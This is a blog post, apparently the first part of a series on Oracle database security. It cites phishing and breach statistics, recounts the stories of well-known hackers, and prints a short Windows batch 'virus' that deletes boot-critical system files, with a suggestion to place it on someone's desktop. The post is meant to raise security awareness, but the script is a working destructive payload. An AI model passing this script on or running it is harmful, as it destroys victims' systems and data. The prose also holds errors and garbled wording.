Lot of question came to my mind when I start talking about oracle security, How to secure my databases, what should I do?
Adding Firewall to my network is it enough? Enable Oracle Audit Parameter will be enough?
Understand Security as concept is very important to reduce risk of attack and to do that you should make your system is secure.
Having Security awareness is first step to secure the system.
According to RSA reports, there was 7% increase in amount of phishing attacks worldwide between months of July and August 2010, The United States currently leads as the country that suffered the most attacks in regards to online cyber threats with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
The below Graph Show Number of network Security Breaches over Past 12 months (Graph Made by Ponemon Institute)
Included to above reports 1$ trillion the total value of intellectual property hackers stole from business around the world in 2008.
As proof for this I will mention three different stories for the biggest top “black hat” hackers
The below Graph Shown How much Did the Cyber-attack Cost Company over 12 month (Graph Made by Ponemon Institute)
Jonathan James when he hacked NASA he was 16 years old with that he was the first juvenile sent to the present, Installed backdoor into defense threats reductions agency server and jacked into NASA Computers stealing software worth 1.7M $ Costing NASA 41,000$ in Repair.
Adrian Lamo Hacked into NY Times and Microsoft using wifi Coffee shop, Viewed Personal Information and High profile Subject matter
The last example Kevin Mitnick spent two years stealing corporate secrets and breaking into the US national defense warning system.
Computer Hacking is usually used as stereotypes in movies and cartoons as Guy sitting behind desk with Pepsi Can and not that much luck with ladies , the truth is this guy cost people and companies money and privacy, therefor the hacking effects on individuals , organizations and company.
As individuals victims of computer hacking will lose their saving, privacy even their life, in the early days of computer the virus was the biggest security risk which is cause data losing. After that it’s replaced with malware which is small software designed to do job such as key logger or virus scanner but now this software not more any fun since the hackers now creating malware.
Nothing easier today than writing virus just to do annoying things, the below code just an example how writing a virus.
You can find step to write virus, Trojan or even worm on the internet and for free, this is what makes problem bigger, because internal user can read this information and start using them so you should prepare to all these kind of attacks.
The below example for simple virus, all you have to do is save as batch file and put it on someone desktop
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +919870807070 for hacking tricks
The Above subject is only part One of Overview I will Post More topics included Full Description how to secure Oracle Database.
Thank you
Osama mustafa